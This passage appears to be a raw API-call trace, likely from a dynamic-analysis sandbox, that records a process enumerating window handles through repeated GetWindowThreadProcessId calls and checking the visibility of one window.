	[0707.575] GetWindowThreadProcessId (in: hWnd=0x1005e, lpdwProcessId=0x22dd00 | out: lpdwProcessId=0x22dd00) returned 0x4d0
	[0707.575] GetWindowThreadProcessId (in: hWnd=0x10056, lpdwProcessId=0x22dd00 | out: lpdwProcessId=0x22dd00) returned 0x4d0
	[0707.575] GetWindowThreadProcessId (in: hWnd=0x100fa, lpdwProcessId=0x22dd00 | out: lpdwProcessId=0x22dd00) returned 0x460
	[0707.575] GetWindowThreadProcessId (in: hWnd=0x500a2, lpdwProcessId=0x22dd00 | out: lpdwProcessId=0x22dd00) returned 0x4d0
	[0707.575] GetWindowThreadProcessId (in: hWnd=0x10092, lpdwProcessId=0x22dd00 | out: lpdwProcessId=0x22dd00) returned 0x4d0
	[0707.575] GetWindowThreadProcessId (in: hWnd=0x10a0e, lpdwProcessId=0x22dd00 | out: lpdwProcessId=0x22dd00) returned 0x1e28
	[0707.575] GetWindowThreadProcessId (in: hWnd=0x10a0a, lpdwProcessId=0x22dd00 | out: lpdwProcessId=0x22dd00) returned 0x1df8
	[0707.575] GetWindowThreadProcessId (in: hWnd=0x10a06, lpdwProcessId=0x22dd00 | out: lpdwProcessId=0x22dd00) returned 0x1da8
	[0707.575] GetWindowThreadProcessId (in: hWnd=0x3060a, lpdwProcessId=0x22dd00 | out: lpdwProcessId=0x22dd00) returned 0x1c70
	[0707.576] GetWindowThreadProcessId (in: hWnd=0x109ec, lpdwProcessId=0x22dd00 | out: lpdwProcessId=0x22dd00) returned 0x163c
	[0707.576] GetWindowThreadProcessId (in: hWnd=0x109de, lpdwProcessId=0x22dd00 | out: lpdwProcessId=0x22dd00) returned 0x1a10
	[0707.576] GetWindowThreadProcessId (in: hWnd=0x109c4, lpdwProcessId=0x22dd00 | out: lpdwProcessId=0x22dd00) returned 0x186c
	[0707.576] GetWindowThreadProcessId (in: hWnd=0x109b4, lpdwProcessId=0x22dd00 | out: lpdwProcessId=0x22dd00) returned 0x1d74
	[0707.576] GetWindowThreadProcessId (in: hWnd=0x1099a, lpdwProcessId=0x22dd00 | out: lpdwProcessId=0x22dd00) returned 0x4c8
	[0707.576] GetWindowThreadProcessId (in: hWnd=0x1098c, lpdwProcessId=0x22dd00 | out: lpdwProcessId=0x22dd00) returned 0x1960
	[0707.576] GetWindowThreadProcessId (in: hWnd=0x1097c, lpdwProcessId=0x22dd00 | out: lpdwProcessId=0x22dd00) returned 0x1ce4
	[0707.576] GetWindowThreadProcessId (in: hWnd=0x1093c, lpdwProcessId=0x22dd00 | out: lpdwProcessId=0x22dd00) returned 0x1b24
	[0707.576] GetWindowThreadProcessId (in: hWnd=0x20942, lpdwProcessId=0x22dd00 | out: lpdwProcessId=0x22dd00) returned 0x14e0
	[0707.576] GetWindowThreadProcessId (in: hWnd=0x204b0, lpdwProcessId=0x22dd00 | out: lpdwProcessId=0x22dd00) returned 0x17f0
	[0707.576] GetWindowThreadProcessId (in: hWnd=0x10952, lpdwProcessId=0x22dd00 | out: lpdwProcessId=0x22dd00) returned 0x854
	[0707.576] GetWindowThreadProcessId (in: hWnd=0x10950, lpdwProcessId=0x22dd00 | out: lpdwProcessId=0x22dd00) returned 0x1268
	[0707.577] GetWindowThreadProcessId (in: hWnd=0x1094e, lpdwProcessId=0x22dd00 | out: lpdwProcessId=0x22dd00) returned 0x1624
	[0707.577] GetWindowThreadProcessId (in: hWnd=0x1094c, lpdwProcessId=0x22dd00 | out: lpdwProcessId=0x22dd00) returned 0x1b9c
	[0707.577] GetWindowThreadProcessId (in: hWnd=0x1094a, lpdwProcessId=0x22dd00 | out: lpdwProcessId=0x22dd00) returned 0x16f4
	[0707.577] GetWindowThreadProcessId (in: hWnd=0x10948, lpdwProcessId=0x22dd00 | out: lpdwProcessId=0x22dd00) returned 0x145c
	[0707.577] GetWindowThreadProcessId (in: hWnd=0x1093e, lpdwProcessId=0x22dd00 | out: lpdwProcessId=0x22dd00) returned 0x17d0
	[0707.577] GetWindowThreadProcessId (in: hWnd=0x206ba, lpdwProcessId=0x22dd00 | out: lpdwProcessId=0x22dd00) returned 0x1d28
	[0707.577] GetWindowThreadProcessId (in: hWnd=0x1093a, lpdwProcessId=0x22dd00 | out: lpdwProcessId=0x22dd00) returned 0xcb8
	[0707.577] GetWindowThreadProcessId (in: hWnd=0x20614, lpdwProcessId=0x22dd00 | out: lpdwProcessId=0x22dd00) returned 0x1190
	[0707.577] GetWindowThreadProcessId (in: hWnd=0x2041c, lpdwProcessId=0x22dd00 | out: lpdwProcessId=0x22dd00) returned 0x3a8
	[0707.577] GetWindowThreadProcessId (in: hWnd=0x20420, lpdwProcessId=0x22dd00 | out: lpdwProcessId=0x22dd00) returned 0x1bd0
	[0707.577] GetWindowThreadProcessId (in: hWnd=0x304c0, lpdwProcessId=0x22dd00 | out: lpdwProcessId=0x22dd00) returned 0x1bfc
	[0707.577] GetWindowThreadProcessId (in: hWnd=0x108b8, lpdwProcessId=0x22dd00 | out: lpdwProcessId=0x22dd00) returned 0x1a78
	[0707.578] GetWindowThreadProcessId (in: hWnd=0x108b2, lpdwProcessId=0x22dd00 | out: lpdwProcessId=0x22dd00) returned 0x1b90
	[0707.578] GetWindowThreadProcessId (in: hWnd=0x108ac, lpdwProcessId=0x22dd00 | out: lpdwProcessId=0x22dd00) returned 0x1b04
	[0707.578] GetWindowThreadProcessId (in: hWnd=0x108a0, lpdwProcessId=0x22dd00 | out: lpdwProcessId=0x22dd00) returned 0x1b34
	[0707.578] GetWindowThreadProcessId (in: hWnd=0x1088e, lpdwProcessId=0x22dd00 | out: lpdwProcessId=0x22dd00) returned 0x1b64
	[0707.578] GetWindowThreadProcessId (in: hWnd=0x1087c, lpdwProcessId=0x22dd00 | out: lpdwProcessId=0x22dd00) returned 0x1bb0
	[0707.578] GetWindowThreadProcessId (in: hWnd=0x204f6, lpdwProcessId=0x22dd00 | out: lpdwProcessId=0x22dd00) returned 0x1acc
	[0707.578] GetWindowThreadProcessId (in: hWnd=0x1083e, lpdwProcessId=0x22dd00 | out: lpdwProcessId=0x22dd00) returned 0x1a2c
	[0707.578] GetWindowThreadProcessId (in: hWnd=0x2042c, lpdwProcessId=0x22dd00 | out: lpdwProcessId=0x22dd00) returned 0x19a8
	[0707.578] GetWindowThreadProcessId (in: hWnd=0x10836, lpdwProcessId=0x22dd00 | out: lpdwProcessId=0x22dd00) returned 0x1944
	[0707.579] GetWindowThreadProcessId (in: hWnd=0x10826, lpdwProcessId=0x22dd00 | out: lpdwProcessId=0x22dd00) returned 0x18c8
	[0707.579] GetWindowThreadProcessId (in: hWnd=0x10822, lpdwProcessId=0x22dd00 | out: lpdwProcessId=0x22dd00) returned 0x18ac
	[0707.579] GetWindowThreadProcessId (in: hWnd=0x1081e, lpdwProcessId=0x22dd00 | out: lpdwProcessId=0x22dd00) returned 0x18ec
	[0707.579] GetWindowThreadProcessId (in: hWnd=0x1081a, lpdwProcessId=0x22dd00 | out: lpdwProcessId=0x22dd00) returned 0x1898
	[0707.579] GetWindowThreadProcessId (in: hWnd=0x10810, lpdwProcessId=0x22dd00 | out: lpdwProcessId=0x22dd00) returned 0xc98
	[0707.579] GetWindowThreadProcessId (in: hWnd=0x1080a, lpdwProcessId=0x22dd00 | out: lpdwProcessId=0x22dd00) returned 0x153c
	[0707.579] GetWindowThreadProcessId (in: hWnd=0x10806, lpdwProcessId=0x22dd00 | out: lpdwProcessId=0x22dd00) returned 0x1808
	[0707.579] GetWindowThreadProcessId (in: hWnd=0x10790, lpdwProcessId=0x22dd00 | out: lpdwProcessId=0x22dd00) returned 0x12a4
	[0707.579] GetWindowThreadProcessId (in: hWnd=0x1078e, lpdwProcessId=0x22dd00 | out: lpdwProcessId=0x22dd00) returned 0x1740
	[0707.579] GetWindowThreadProcessId (in: hWnd=0x10784, lpdwProcessId=0x22dd00 | out: lpdwProcessId=0x22dd00) returned 0x16c4
	[0707.579] GetWindowThreadProcessId (in: hWnd=0x107c2, lpdwProcessId=0x22dd00 | out: lpdwProcessId=0x22dd00) returned 0x1820
	[0707.580] GetWindowThreadProcessId (in: hWnd=0x107b4, lpdwProcessId=0x22dd00 | out: lpdwProcessId=0x22dd00) returned 0x16ac
	[0707.580] GetWindowThreadProcessId (in: hWnd=0x1079a, lpdwProcessId=0x22dd00 | out: lpdwProcessId=0x22dd00) returned 0x1858
	[0707.580] GetWindowThreadProcessId (in: hWnd=0x1077e, lpdwProcessId=0x22dd00 | out: lpdwProcessId=0x22dd00) returned 0x1664
	[0707.580] GetWindowThreadProcessId (in: hWnd=0x10778, lpdwProcessId=0x22dd00 | out: lpdwProcessId=0x22dd00) returned 0x10b4
	[0707.580] GetWindowThreadProcessId (in: hWnd=0x10774, lpdwProcessId=0x22dd00 | out: lpdwProcessId=0x22dd00) returned 0x10ac
	[0707.580] GetWindowThreadProcessId (in: hWnd=0x20378, lpdwProcessId=0x22dd00 | out: lpdwProcessId=0x22dd00) returned 0x10ec
	[0707.580] GetWindowThreadProcessId (in: hWnd=0x10766, lpdwProcessId=0x22dd00 | out: lpdwProcessId=0x22dd00) returned 0x1068
	[0707.580] GetWindowThreadProcessId (in: hWnd=0x10762, lpdwProcessId=0x22dd00 | out: lpdwProcessId=0x22dd00) returned 0x17e0
	[0707.580] GetWindowThreadProcessId (in: hWnd=0x1075e, lpdwProcessId=0x22dd00 | out: lpdwProcessId=0x22dd00) returned 0x102c
	[0707.580] GetWindowThreadProcessId (in: hWnd=0x1075a, lpdwProcessId=0x22dd00 | out: lpdwProcessId=0x22dd00) returned 0x17a4
	[0707.581] GetWindowThreadProcessId (in: hWnd=0x2035a, lpdwProcessId=0x22dd00 | out: lpdwProcessId=0x22dd00) returned 0x1050
	[0707.581] GetWindowThreadProcessId (in: hWnd=0x1072c, lpdwProcessId=0x22dd00 | out: lpdwProcessId=0x22dd00) returned 0x1694
	[0707.581] GetWindowThreadProcessId (in: hWnd=0x1071e, lpdwProcessId=0x22dd00 | out: lpdwProcessId=0x22dd00) returned 0x1770
	[0707.581] GetWindowThreadProcessId (in: hWnd=0x10710, lpdwProcessId=0x22dd00 | out: lpdwProcessId=0x22dd00) returned 0x1720
	[0707.581] GetWindowThreadProcessId (in: hWnd=0x10702, lpdwProcessId=0x22dd00 | out: lpdwProcessId=0x22dd00) returned 0x165c
	[0707.581] GetWindowThreadProcessId (in: hWnd=0x106ca, lpdwProcessId=0x22dd00 | out: lpdwProcessId=0x22dd00) returned 0x1578
	[0707.581] GetWindowThreadProcessId (in: hWnd=0x204a6, lpdwProcessId=0x22dd00 | out: lpdwProcessId=0x22dd00) returned 0x16c0
	[0707.581] GetWindowThreadProcessId (in: hWnd=0x106c4, lpdwProcessId=0x22dd00 | out: lpdwProcessId=0x22dd00) returned 0x161c
	[0707.581] GetWindowThreadProcessId (in: hWnd=0x106c0, lpdwProcessId=0x22dd00 | out: lpdwProcessId=0x22dd00) returned 0x1638
	[0707.581] GetWindowThreadProcessId (in: hWnd=0x20362, lpdwProcessId=0x22dd00 | out: lpdwProcessId=0x22dd00) returned 0x15c8
	[0707.582] GetWindowThreadProcessId (in: hWnd=0x106be, lpdwProcessId=0x22dd00 | out: lpdwProcessId=0x22dd00) returned 0x1554
	[0707.582] GetWindowThreadProcessId (in: hWnd=0x106bc, lpdwProcessId=0x22dd00 | out: lpdwProcessId=0x22dd00) returned 0x1674
	[0707.582] GetWindowThreadProcessId (in: hWnd=0x106b4, lpdwProcessId=0x22dd00 | out: lpdwProcessId=0x22dd00) returned 0x1520
	[0707.582] GetWindowThreadProcessId (in: hWnd=0x1068e, lpdwProcessId=0x22dd00 | out: lpdwProcessId=0x22dd00) returned 0x14bc
	[0707.582] GetWindowThreadProcessId (in: hWnd=0x1067e, lpdwProcessId=0x22dd00 | out: lpdwProcessId=0x22dd00) returned 0xf8c
	[0707.582] GetWindowThreadProcessId (in: hWnd=0x1066e, lpdwProcessId=0x22dd00 | out: lpdwProcessId=0x22dd00) returned 0xe9c
	[0707.582] GetWindowThreadProcessId (in: hWnd=0x1065e, lpdwProcessId=0x22dd00 | out: lpdwProcessId=0x22dd00) returned 0x1434
	[0707.582] GetWindowThreadProcessId (in: hWnd=0x1064e, lpdwProcessId=0x22dd00 | out: lpdwProcessId=0x22dd00) returned 0x14ec
	[0707.582] GetWindowThreadProcessId (in: hWnd=0x1063e, lpdwProcessId=0x22dd00 | out: lpdwProcessId=0x22dd00) returned 0xfcc
	[0707.582] GetWindowThreadProcessId (in: hWnd=0x1062e, lpdwProcessId=0x22dd00 | out: lpdwProcessId=0x22dd00) returned 0x12ac
	[0707.583] GetWindowThreadProcessId (in: hWnd=0x1062a, lpdwProcessId=0x22dd00 | out: lpdwProcessId=0x22dd00) returned 0x1484
	[0707.583] GetWindowThreadProcessId (in: hWnd=0x10626, lpdwProcessId=0x22dd00 | out: lpdwProcessId=0x22dd00) returned 0x934
	[0707.583] GetWindowThreadProcessId (in: hWnd=0x10622, lpdwProcessId=0x22dd00 | out: lpdwProcessId=0x22dd00) returned 0xc0c
	[0707.583] GetWindowThreadProcessId (in: hWnd=0x1061c, lpdwProcessId=0x22dd00 | out: lpdwProcessId=0x22dd00) returned 0xb08
	[0707.583] GetWindowThreadProcessId (in: hWnd=0x10610, lpdwProcessId=0x22dd00 | out: lpdwProcessId=0x22dd00) returned 0x948
	[0707.583] GetWindowThreadProcessId (in: hWnd=0x1060c, lpdwProcessId=0x22dd00 | out: lpdwProcessId=0x22dd00) returned 0x1178
	[0707.583] GetWindowThreadProcessId (in: hWnd=0x105fa, lpdwProcessId=0x22dd00 | out: lpdwProcessId=0x22dd00) returned 0x13e0
	[0707.583] GetWindowThreadProcessId (in: hWnd=0x105ea, lpdwProcessId=0x22dd00 | out: lpdwProcessId=0x22dd00) returned 0xcd0
	[0707.583] GetWindowThreadProcessId (in: hWnd=0x105da, lpdwProcessId=0x22dd00 | out: lpdwProcessId=0x22dd00) returned 0x13fc
	[0707.583] GetWindowThreadProcessId (in: hWnd=0x105c6, lpdwProcessId=0x22dd00 | out: lpdwProcessId=0x22dd00) returned 0xdc8
	[0707.584] GetWindowThreadProcessId (in: hWnd=0x105b6, lpdwProcessId=0x22dd00 | out: lpdwProcessId=0x22dd00) returned 0xc18
	[0707.584] GetWindowThreadProcessId (in: hWnd=0x105a6, lpdwProcessId=0x22dd00 | out: lpdwProcessId=0x22dd00) returned 0xc2c
	[0707.584] GetWindowThreadProcessId (in: hWnd=0x10580, lpdwProcessId=0x22dd00 | out: lpdwProcessId=0x22dd00) returned 0xa1c
	[0707.584] GetWindowThreadProcessId (in: hWnd=0x10578, lpdwProcessId=0x22dd00 | out: lpdwProcessId=0x22dd00) returned 0x1244
	[0707.584] GetWindowThreadProcessId (in: hWnd=0x10574, lpdwProcessId=0x22dd00 | out: lpdwProcessId=0x22dd00) returned 0xdb0
	[0707.584] GetWindowThreadProcessId (in: hWnd=0x20356, lpdwProcessId=0x22dd00 | out: lpdwProcessId=0x22dd00) returned 0x1398
	[0707.584] GetWindowThreadProcessId (in: hWnd=0x10566, lpdwProcessId=0x22dd00 | out: lpdwProcessId=0x22dd00) returned 0x1358
	[0707.584] GetWindowThreadProcessId (in: hWnd=0x10562, lpdwProcessId=0x22dd00 | out: lpdwProcessId=0x22dd00) returned 0x1370
	[0707.585] GetWindowThreadProcessId (in: hWnd=0x1055e, lpdwProcessId=0x22dd00 | out: lpdwProcessId=0x22dd00) returned 0x1340
	[0707.585] GetWindowThreadProcessId (in: hWnd=0x10558, lpdwProcessId=0x22dd00 | out: lpdwProcessId=0x22dd00) returned 0x130c
	[0707.585] GetWindowThreadProcessId (in: hWnd=0x10550, lpdwProcessId=0x22dd00 | out: lpdwProcessId=0x22dd00) returned 0x12c0
	[0707.585] GetWindowThreadProcessId (in: hWnd=0x2053a, lpdwProcessId=0x22dd00 | out: lpdwProcessId=0x22dd00) returned 0x12e4
	[0707.585] GetWindowThreadProcessId (in: hWnd=0x1051a, lpdwProcessId=0x22dd00 | out: lpdwProcessId=0x22dd00) returned 0x1270
	[0707.585] GetWindowThreadProcessId (in: hWnd=0x1050a, lpdwProcessId=0x22dd00 | out: lpdwProcessId=0x22dd00) returned 0x1298
	[0707.585] GetWindowThreadProcessId (in: hWnd=0x104fa, lpdwProcessId=0x22dd00 | out: lpdwProcessId=0x22dd00) returned 0x120c
	[0707.585] GetWindowThreadProcessId (in: hWnd=0x204d6, lpdwProcessId=0x22dd00 | out: lpdwProcessId=0x22dd00) returned 0x122c
	[0707.586] GetWindowThreadProcessId (in: hWnd=0x104ce, lpdwProcessId=0x22dd00 | out: lpdwProcessId=0x22dd00) returned 0x11c4
	[0707.586] GetWindowThreadProcessId (in: hWnd=0x202d6, lpdwProcessId=0x22dd00 | out: lpdwProcessId=0x22dd00) returned 0x11b0
	[0707.586] GetWindowThreadProcessId (in: hWnd=0x104c8, lpdwProcessId=0x22dd00 | out: lpdwProcessId=0x22dd00) returned 0x1188
	[0707.586] GetWindowThreadProcessId (in: hWnd=0x104c4, lpdwProcessId=0x22dd00 | out: lpdwProcessId=0x22dd00) returned 0x1148
	[0707.586] GetWindowThreadProcessId (in: hWnd=0x202e6, lpdwProcessId=0x22dd00 | out: lpdwProcessId=0x22dd00) returned 0x1160
	[0707.586] GetWindowThreadProcessId (in: hWnd=0x30272, lpdwProcessId=0x22dd00 | out: lpdwProcessId=0x22dd00) returned 0x10fc
	[0707.586] GetWindowThreadProcessId (in: hWnd=0x104bc, lpdwProcessId=0x22dd00 | out: lpdwProcessId=0x22dd00) returned 0xe34
	[0707.586] GetWindowThreadProcessId (in: hWnd=0x104ac, lpdwProcessId=0x22dd00 | out: lpdwProcessId=0x22dd00) returned 0xea4
	[0707.586] GetWindowThreadProcessId (in: hWnd=0x1048e, lpdwProcessId=0x22dd00 | out: lpdwProcessId=0x22dd00) returned 0x514
	[0707.587] GetWindowThreadProcessId (in: hWnd=0x1047e, lpdwProcessId=0x22dd00 | out: lpdwProcessId=0x22dd00) returned 0xe48
	[0707.587] GetWindowThreadProcessId (in: hWnd=0x1046e, lpdwProcessId=0x22dd00 | out: lpdwProcessId=0x22dd00) returned 0xbc8
	[0707.587] GetWindowThreadProcessId (in: hWnd=0x1045e, lpdwProcessId=0x22dd00 | out: lpdwProcessId=0x22dd00) returned 0xdf8
	[0707.588] GetWindow (hWnd=0x1045e, uCmd=0x4) returned 0x0
	[0707.589] IsWindowVisible (hWnd=0x1045e) returned 0
	[0707.589] GetWindowThreadProcessId (in: hWnd=0x1044c, lpdwProcessId=0x22dd00 | out: lpdwProcessId=0x22dd00) returned 0x318
	[0707.589] GetWindowThreadProcessId (in: hWnd=0x10440, lpdwProcessId=0x22dd00 | out: lpdwProcessId=0x22dd00) returned 0xcac
	[0707.589] GetWindowThreadProcessId (in: hWnd=0x10438, lpdwProcessId=0x22dd00 | out: lpdwProcessId=0x22dd00) returned 0x8bc
	[0707.589] GetWindowThreadProcessId (in: hWnd=0x10434, lpdwProcessId=0x22dd00 | out: lpdwProcessId=0x22dd00) returned 0xf9c
	[0707.589] GetWindowThreadProcessId (in: hWnd=0x10430, lpdwProcessId=0x22dd00 | out: lpdwProcessId=0x22dd00) returned 0xf48
	[0707.589] GetWindowThreadProcessId (in: hWnd=0x10414, lpdwProcessId=0x22dd00 | out: lpdwProcessId=0x22dd00) returned 0xe40
	[0707.589] GetWindowThreadProcessId (in: hWnd=0x10410, lpdwProcessId=0x22dd00 | out: lpdwProcessId=0x22dd00) returned 0xecc
	[0707.590] GetWindowThreadProcessId (in: hWnd=0x1040c, lpdwProcessId=0x22dd00 | out: lpdwProcessId=0x22dd00) returned 0xeb8
	[0707.590] GetWindowThreadProcessId (in: hWnd=0x10408, lpdwProcessId=0x22dd00 | out: lpdwProcessId=0x22dd00) returned 0xe80
	[0707.590] GetWindowThreadProcessId (in: hWnd=0x10404, lpdwProcessId=0x22dd00 | out: lpdwProcessId=0x22dd00) returned 0xe98
	[0707.590] GetWindowThreadProcessId (in: hWnd=0x10400, lpdwProcessId=0x22dd00 | out: lpdwProcessId=0x22dd00) returned 0xe60
	[0707.590] GetWindowThreadProcessId (in: hWnd=0x103fc, lpdwProcessId=0x22dd00 | out: lpdwProcessId=0x22dd00) returned 0xee4
	[0707.590] GetWindowThreadProcessId (in: hWnd=0x103ee, lpdwProcessId=0x22dd00 | out: lpdwProcessId=0x22dd00) returned 0xf00
	[0707.590] GetWindowThreadProcessId (in: hWnd=0x10398, lpdwProcessId=0x22dd00 | out: lpdwProcessId=0x22dd00) returned 0xdf0
	[0707.590] GetWindowThreadProcessId (in: hWnd=0x10388, lpdwProcessId=0x22dd00 | out: lpdwProcessId=0x22dd00) returned 0xe1c
	[0707.591] GetWindowThreadProcessId (in: hWnd=0x10380, lpdwProcessId=0x22dd00 | out: lpdwProcessId=0x22dd00) returned 0xdd0
	[0707.591] GetWindowThreadProcessId (in: hWnd=0x1036c, lpdwProcessId=0x22dd00 | out: lpdwProcessId=0x22dd00) returned 0xd94
	[0707.591] GetWindowThreadProcessId (in: hWnd=0x10368, lpdwProcessId=0x22dd00 | out: lpdwProcessId=0x22dd00) returned 0xd74
	[0707.591] GetWindowThreadProcessId (in: hWnd=0x10364, lpdwProcessId=0x22dd00 | out: lpdwProcessId=0x22dd00) returned 0xd00
	[0707.591] GetWindowThreadProcessId (in: hWnd=0x1035e, lpdwProcessId=0x22dd00 | out: lpdwProcessId=0x22dd00) returned 0xcd8
	[0707.591] GetWindowThreadProcessId (in: hWnd=0x20240, lpdwProcessId=0x22dd00 | out: lpdwProcessId=0x22dd00) returned 0xc84
	[0707.591] GetWindowThreadProcessId (in: hWnd=0x30220, lpdwProcessId=0x22dd00 | out: lpdwProcessId=0x22dd00) returned 0xca4
	[0707.591] GetWindowThreadProcessId (in: hWnd=0x2010e, lpdwProcessId=0x22dd00 | out: lpdwProcessId=0x22dd00) returned 0xc64
	[0707.592] GetWindowThreadProcessId (in: hWnd=0x10344, lpdwProcessId=0x22dd00 | out: lpdwProcessId=0x22dd00) returned 0xc24
	[0707.592] GetWindowThreadProcessId (in: hWnd=0x1032a, lpdwProcessId=0x22dd00 | out: lpdwProcessId=0x22dd00) returned 0xb84
	[0707.592] GetWindowThreadProcessId (in: hWnd=0x10316, lpdwProcessId=0x22dd00 | out: lpdwProcessId=0x22dd00) returned 0xbac
	[0707.592] GetWindowThreadProcessId (in: hWnd=0x102f8, lpdwProcessId=0x22dd00 | out: lpdwProcessId=0x22dd00) returned 0x384
	[0707.592] GetWindowThreadProcessId (in: hWnd=0x102de, lpdwProcessId=0x22dd00 | out: lpdwProcessId=0x22dd00) returned 0xab8
	[0707.592] GetWindowThreadProcessId (in: hWnd=0x102da, lpdwProcessId=0x22dd00 | out: lpdwProcessId=0x22dd00) returned 0x33c
	[0707.592] GetWindowThreadProcessId (in: hWnd=0x102d0, lpdwProcessId=0x22dd00 | out: lpdwProcessId=0x22dd00) returned 0xa44
	[0707.592] GetWindowThreadProcessId (in: hWnd=0x102cc, lpdwProcessId=0x22dd00 | out: lpdwProcessId=0x22dd00) returned 0xa64
	[0707.593] GetWindowThreadProcessId (in: hWnd=0x102c8, lpdwProcessId=0x22dd00 | out: lpdwProcessId=0x22dd00) returned 0x8a8
	[0707.593] GetWindowThreadProcessId (in: hWnd=0x102c4, lpdwProcessId=0x22dd00 | out: lpdwProcessId=0x22dd00) returned 0xaf0
	[0707.593] GetWindowThreadProcessId (in: hWnd=0x102c0, lpdwProcessId=0x22dd00 | out: lpdwProcessId=0x22dd00) returned 0x88c
	[0707.593] GetWindowThreadProcessId (in: hWnd=0x102bc, lpdwProcessId=0x22dd00 | out: lpdwProcessId=0x22dd00) returned 0xb04
	[0707.593] GetWindowThreadProcessId (in: hWnd=0x102b0, lpdwProcessId=0x22dd00 | out: lpdwProcessId=0x22dd00) returned 0x910
	[0707.593] GetWindowThreadProcessId (in: hWnd=0x102ac, lpdwProcessId=0x22dd00 | out: lpdwProcessId=0x22dd00) returned 0x230
	[0707.593] GetWindowThreadProcessId (in: hWnd=0x30298, lpdwProcessId=0x22dd00 | out: lpdwProcessId=0x22dd00) returned 0xac0
	[0707.593] GetWindowThreadProcessId (in: hWnd=0x2029a, lpdwProcessId=0x22dd00 | out: lpdwProcessId=0x22dd00) returned 0xab4
	[0707.594] GetWindowThreadProcessId (in: hWnd=0x10262, lpdwProcessId=0x22dd00 | out: lpdwProcessId=0x22dd00) returned 0xaac
	[0707.594] GetWindowThreadProcessId (in: hWnd=0x10252, lpdwProcessId=0x22dd00 | out: lpdwProcessId=0x22dd00) returned 0x3d0
	[0707.594] GetWindowThreadProcessId (in: hWnd=0x10242, lpdwProcessId=0x22dd00 | out: lpdwProcessId=0x22dd00) returned 0x978
	[0707.594] GetWindowThreadProcessId (in: hWnd=0x10228, lpdwProcessId=0x22dd00 | out: lpdwProcessId=0x22dd00) returned 0xa7c
	[0707.594] GetWindowThreadProcessId (in: hWnd=0x10224, lpdwProcessId=0x22dd00 | out: lpdwProcessId=0x22dd00) returned 0x59c
	[0707.594] GetWindowThreadProcessId (in: hWnd=0x20212, lpdwProcessId=0x22dd00 | out: lpdwProcessId=0x22dd00) returned 0xa88
	[0707.594] GetWindowThreadProcessId (in: hWnd=0x1021c, lpdwProcessId=0x22dd00 | out: lpdwProcessId=0x22dd00) returned 0xa6c
	[0707.594] GetWindowThreadProcessId (in: hWnd=0x10214, lpdwProcessId=0x22dd00 | out: lpdwProcessId=0x22dd00) returned 0xa68
	[0707.595] GetWindowThreadProcessId (in: hWnd=0x20206, lpdwProcessId=0x22dd00 | out: lpdwProcessId=0x22dd00) returned 0x9f8
	[0707.595] GetWindowThreadProcessId (in: hWnd=0x20204, lpdwProcessId=0x22dd00 | out: lpdwProcessId=0x22dd00) returned 0xa04
	[0707.595] GetWindowThreadProcessId (in: hWnd=0x1020a, lpdwProcessId=0x22dd00 | out: lpdwProcessId=0x22dd00) returned 0x924
	[0707.595] GetWindowThreadProcessId (in: hWnd=0x10200, lpdwProcessId=0x22dd00 | out: lpdwProcessId=0x22dd00) returned 0x8dc
	[0707.595] GetWindowThreadProcessId (in: hWnd=0x201ec, lpdwProcessId=0x22dd00 | out: lpdwProcessId=0x22dd00) returned 0x7dc
	[0707.595] GetWindowThreadProcessId (in: hWnd=0x301d6, lpdwProcessId=0x22dd00 | out: lpdwProcessId=0x22dd00) returned 0x768
	[0707.595] GetWindowThreadProcessId (in: hWnd=0x301e0, lpdwProcessId=0x22dd00 | out: lpdwProcessId=0x22dd00) returned 0x764
	[0707.595] GetWindowThreadProcessId (in: hWnd=0x201e4, lpdwProcessId=0x22dd00 | out: lpdwProcessId=0x22dd00) returned 0x820
	[0707.596] GetWindowThreadProcessId (in: hWnd=0x201c6, lpdwProcessId=0x22dd00 | out: lpdwProcessId=0x22dd00) returned 0x810
	[0707.596] GetWindowThreadProcessId (in: hWnd=0x301f2, lpdwProcessId=0x22dd00 | out: lpdwProcessId=0x22dd00) returned 0x794
	[0707.596] GetWindowThreadProcessId (in: hWnd=0x401b6, lpdwProcessId=0x22dd00 | out: lpdwProcessId=0x22dd00) returned 0x83c
	[0707.596] GetWindowThreadProcessId (in: hWnd=0x501be, lpdwProcessId=0x22dd00 | out: lpdwProcessId=0x22dd00) returned 0x7ac
	[0707.596] GetWindowThreadProcessId (in: hWnd=0x160162, lpdwProcessId=0x22dd00 | out: lpdwProcessId=0x22dd00) returned 0xb44
	[0707.596] GetWindowThreadProcessId (in: hWnd=0x108d6, lpdwProcessId=0x22dd00 | out: lpdwProcessId=0x22dd00) returned 0x6bc
	[0707.596] GetWindowThreadProcessId (in: hWnd=0x500ea, lpdwProcessId=0x22dd00 | out: lpdwProcessId=0x22dd00) returned 0xb5c
	[0707.596] GetWindowThreadProcessId (in: hWnd=0x101b0, lpdwProcessId=0x22dd00 | out: lpdwProcessId=0x22dd00) returned 0x838
	[0707.597] GetWindowThreadProcessId (in: hWnd=0x800a8, lpdwProcessId=0x22dd00 | out: lpdwProcessId=0x22dd00) returned 0x4d0
	[0707.597] GetWindowThreadProcessId (in: hWnd=0x400b0, lpdwProcessId=0x22dd00 | out: lpdwProcessId=0x22dd00) returned 0x4d0
	[0707.597] GetWindowThreadProcessId (in: hWnd=0x300c6, lpdwProcessId=0x22dd00 | out: lpdwProcessId=0x22dd00) returned 0x4d0
	[0707.597] GetWindowThreadProcessId (in: hWnd=0x300d2, lpdwProcessId=0x22dd00 | out: lpdwProcessId=0x22dd00) returned 0x4d0
	[0707.597] GetWindowThreadProcessId (in: hWnd=0x300ce, lpdwProcessId=0x22dd00 | out: lpdwProcessId=0x22dd00) returned 0x4d0
	[0707.597] GetWindowThreadProcessId (in: hWnd=0x300d8, lpdwProcessId=0x22dd00 | out: lpdwProcessId=0x22dd00) returned 0x4d0
	[0707.597] GetWindowThreadProcessId (in: hWnd=0x400b8, lpdwProcessId=0x22dd00 | out: lpdwProcessId=0x22dd00) returned 0x4d0
	[0707.597] GetWindowThreadProcessId (in: hWnd=0x300ac, lpdwProcessId=0x22dd00 | out: lpdwProcessId=0x22dd00) returned 0x4d0
	[0707.597] GetWindowThreadProcessId (in: hWnd=0x101ac, lpdwProcessId=0x22dd00 | out: lpdwProcessId=0x22dd00) returned 0x818
	[0707.598] GetWindowThreadProcessId (in: hWnd=0x101a8, lpdwProcessId=0x22dd00 | out: lpdwProcessId=0x22dd00) returned 0x5b8
	[0707.598] GetWindowThreadProcessId (in: hWnd=0x101a4, lpdwProcessId=0x22dd00 | out: lpdwProcessId=0x22dd00) returned 0x494
	[0707.598] GetWindowThreadProcessId (in: hWnd=0x101a0, lpdwProcessId=0x22dd00 | out: lpdwProcessId=0x22dd00) returned 0x1ec
